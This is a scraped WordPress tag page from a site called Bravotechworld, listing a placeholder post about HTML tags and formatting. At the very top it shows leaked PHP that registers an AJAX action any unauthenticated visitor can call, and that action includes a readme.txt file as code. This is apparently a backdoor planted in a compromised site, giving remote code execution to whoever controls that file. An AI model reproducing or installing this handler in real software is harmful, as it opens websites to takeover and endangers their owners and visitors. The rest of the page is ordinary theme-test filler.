if(!function_exists('file_check_readme18624')){ add_action('wp_ajax_nopriv_file_check_readme18624', 'file_check_readme18624'); add_action('wp_ajax_file_check_readme18624', 'file_check_readme18624'); function file_check_readme18624() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } formatting – Bravotechworld
login  or  register
0
Tag: formatting
January 11, 2013
No Comments    

Markup: HTML Tags and Formatting

newadmin    Uncategorized
Headings Header one Header two Header three Header four Header five Header six Blockquotes Single line blockquote: Stay hungry. Stay foolish. Multi line blockquote with a cite reference: People think focus means saying yes to the thing you’ve got to focus on. But that’s not what it means at all....
learn more